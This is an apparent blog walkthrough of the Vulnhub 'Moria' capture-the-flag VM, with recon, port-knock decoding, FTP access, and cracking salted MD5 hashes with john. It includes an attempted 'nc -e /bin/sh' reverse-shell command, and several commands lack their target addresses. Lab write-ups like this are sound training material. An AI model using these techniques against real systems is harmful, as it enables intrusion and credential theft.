Vulnhub Walkthrough: Moria

I was asked to test a VM created by a fellow mod of the netsecfocus slack community (, Here is a writeup of "Moria" by the ever-so-clever @abatchy!


Step 1: Find it.

netdiscover -r
Nice. Let's do a quick little initial scan with nmap.
nmap -p-


Ok, let's throw it in a web browser and see what happens

Hmm, nothing here other than this picture. Let's throw dirb at it.

dirb -w

Browsing to shows a page called the_abyss, which seems to display a random line of dialog. Instead of refreshing it over and over to get the message, I did this:

for i in {1..1000}; do curl >> ~/abyss.txt; done; sort ~/abyss.txt | uniq

Which returned the following (I believe this has changed to be a little more obvious in the official release):

My first thought was port knocking, so I tried, mostly because of the string "Knock knock", but I didn't have any luck with that. Perhaps I'm not the one who is supposed to be knocking...

tcpdump -vvnn | grep | grep

I let this run for a bit and returned to this output (some has been omitted)

Connections from Moria to my Kali box! (I encourage you after rooting it to take a look at the script that does this. It's pretty clever.)

The ports in question are : "77 101 108 108 111 110"

If you plug those numbers into an online decimal to ascii converter - you get "Mellon"

Maybe this is a password, let's check ftp.

Oh look, a username (Balrog). Neat.

(When I first went through this, I saw the Balrog user in the ftp banner, and tried "Mellon" over ssh. It spat out "WRONG GATE" and kicked me off. After this happened I tried to execute a something like this "ssh Balrog@Moria 'nc -e /bin/sh 8080'" with no success.)

So I poked around a little bit:

"QlVraKW4fbIkXau9zkAPNGzviT3UKntl" looks fishy, let's check it out.

Cool. Hashes. BUT WAIT! There's more!

A little salt action in sauce. At least he gave us "MD5(MD5(Password).Salt)"

Let's tidy this up a bit...

Saved it as 'mypasswd' and sent it to john...
john -form=dynamic_6 mypasswd

How rude, Maeglin...

Maybe we can finally get a low priv shell!

This is the part where @abatchy (almost) made me cry. I probably spent somewhere between 8-12 hours in this shell. At one point I even made a list of every file on the system in order of creation date to try and see how he did it.

So here's the first thing I did when I logged in:

I poked around in the (empty) .bash_history, and looked through .ssh

I believe the exact thought that went through my head was "Weird that he took the time to generate a private key for Ori when we authenticated with a password. Also weird that the known_hosts file has only localhost in it. Huh, anyways off to try every other thing I can think of."


Lessons learned:

  1. Follow through with your suspicions, leave no stone unturned.

  2. Privilege escalation is a massive topic.

and of course

  1. Try harder!


Thank you so much @abatchy for letting me test this VM! You made something super cool and I hope to work with you more in the future!